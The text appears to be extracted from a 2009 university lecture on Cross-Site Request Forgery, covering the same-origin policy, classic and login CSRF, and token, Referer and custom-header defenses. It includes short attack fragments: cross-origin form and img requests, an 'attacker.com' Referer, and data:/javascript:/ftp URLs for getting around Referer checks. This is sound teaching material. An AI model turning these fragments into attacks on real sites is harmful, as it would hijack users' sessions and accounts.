![Page 1: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/1.jpg)
Cross-Site Request Forgery
Collin Jackson 18732: Software Security Fall 2009
![Page 2: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/2.jpg)
Outline
Same-Origin Policy Basic CSRF Existing Defenses Proposed Defenses Advanced Attacks
![Page 3: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/3.jpg)
SAME-ORIGIN POLICY How does the browser isolate different sites?
![Page 4: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/4.jpg)
Policy Goals Safe to visit an evil web site
Safe to visit two pages at the same time • Address bar distinguishes them
Allow safe delegation
![Page 5: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/5.jpg)
Same Origin Policy Origin = protocol://host:port *
Full access to same origin • Network (XMLHttpRequest) • Read/write DOM • Storage?
Assumptions?
Site A
Site A context
Site A context
![Page 6: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/6.jpg)
Same-Origin Policy for Storage
Same Origin Policy (SOP) for DOM: • Origin A can access origin B’s DOM if match on
(scheme, domain, port) Same Original Policy (SOP) for cookies:
• Generally speaking, based on: ([scheme], domain, path)
optional
scheme://domain:port/path?params
![Page 7: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/7.jpg)
Library import <script src=https://seal.verisign.com/getseal?
host_name=a.com></script>
• Script has privileges of imported page, NOT source server. • Can script other pages in this origin, load more scripts • Other forms of importing
![Page 8: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/8.jpg)
Data export Many ways to send information to other
origins <form action="http://www.b.com/"> <input name="data" type="hidden" value="hello"> </form>
<img src="http://www.b.com/?data=hello"/>
No user involvement required Cannot read back response
![Page 9: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/9.jpg)
BASIC CSRF How can data export be abused?
![Page 10: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/10.jpg)
Classic CSRF attack User visits victim site site
• Logs in User loads attacker's site
• Or encounters attacker's iframe on another site
Attacker sends HTTP requests to victim • Victim site assumes
requests originate from itself
![Page 11: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/11.jpg)
Classic CSRF Attack
User credentials
Cookie: SessionID=523FA4cd2E
![Page 12: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/12.jpg)
DEFENSES
![Page 13: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/13.jpg)
CSRF Defenses Secret Validation Token
Referer Validation
Custom HTTP Header
<input type=hidden value=23a3af01b>
Referer: http://www.facebook.com/home.php
X-‐Requested-‐By: XMLHttpRequest
![Page 14: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/14.jpg)
Secret Token Validation Requests include a hard-to-guess secret Unguessable ≈ unforgeable Linked to session cookie
• Overwriting token should not allow CSRF Not equal to session cookie
• Leaking token should not compromise session Suggestion: HMAC of session secret
See "Robust Defenses for Cross-Site Request Forgery" for other options.
![Page 15: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/15.jpg)
Secret Token Validation
![Page 16: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/16.jpg)
Referer Validation
![Page 17: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/17.jpg)
Referer Validation Defense HTTP Referer header
• Referer: http://www.facebook.com/ • Referer: http://www.attacker.com/evil.html • Referer:
Lenient Referer validation • Doesn't work if Referer is missing
Strict Referer validaton • Secure, but Referer is sometimes absent…
?
![Page 18: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/18.jpg)
Referer Privacy Problems Referer may leak privacy-sensitive information
http://intranet.corp.apple.com/ projects/iphone/competitors.html
Common sources of blocking: • Network stripping by the organization • Network stripping by local machine • Stripped by browser for HTTPS -> HTTP transitions • User preference in browser • Buggy user agents
Site cannot afford to block these users
![Page 19: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/19.jpg)
Suppression Measurement 283,945 impressions
![Page 20: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/20.jpg)
Suppression over HTTPS is low
![Page 21: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/21.jpg)
Lenient Validation Vulnerability
Problem: Browsers do not append Referer if the source of the request is not an HTTP page
ftp://attacker.com/attack.html data:text/html,<html>…</html> javascript:'<html>…</html>'
![Page 22: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/22.jpg)
Strict Validation Problems Some sites allow users to post forms
• XSS sanitization doesn't include <form> • These sites need another defense
Many sites allow users to post hyperlinks • Solution: Respect HTTP verb semantics • GET requests have no side effects • POST requests can change state
![Page 23: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/23.jpg)
Custom Header Defense XMLHttpRequest is for same-origin requests
• Can use setRequestHeader within origin Limitations on data export format
• No setRequestHeader equivalent • XHR2 has a whitelist for cross-site requests
Issue POST requests via AJAX:
Doesn't work across domains X-‐Requested-‐By: XMLHttpRequest
![Page 24: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/24.jpg)
Proposed Improvements
" HTTP Origin Header Implemented in Google Chrome Identifies only the origin of requests Less like to be blocked for privacy Send more information for POST than GET Experiment: Cross-domain POSTs out of firewall accounted for
~0.0001% of traffic Problem: Unsafe GET requests Problem: Third-party forms within an origin Question: How to handle redirects?
" Alternative: Same-origin-only cookies Doesn't help multi-domain sites: amazon.com and amazon.co.uk Doesn't help third-party content problem
![Page 25: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/25.jpg)
ADVANCED ATTACKS
![Page 26: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/26.jpg)
Broader view of CSRF
Abuse of cross-site data export feature • From user’s browser to honest server • Disrupts integrity of user’s session
Why mount a CSRF attack? • Network connectivity • Read browser state • Write browser state
Not just “session riding”
![Page 27: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/27.jpg)
Login CSRF
Attacker’s credentials
![Page 28: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/28.jpg)
Payments Login CSRF
![Page 29: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/29.jpg)
Payments Login CSRF
![Page 30: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/30.jpg)
Payments Login CSRF
![Page 31: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/31.jpg)
Payments Login CSRF
![Page 32: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/32.jpg)
Rails vs. Login CSRF
![Page 33: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/33.jpg)
Login CSRF Fails
![Page 34: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/34.jpg)
Conclusion
Server-side defenses are required • Secret token validation – use frameworks like Rails • Referer validation – works over HTTPS • Custom headers – for AJAX
No easy solution • User does not need to have an existing session for attacks to work • Hard to retrofit existing applications with defenses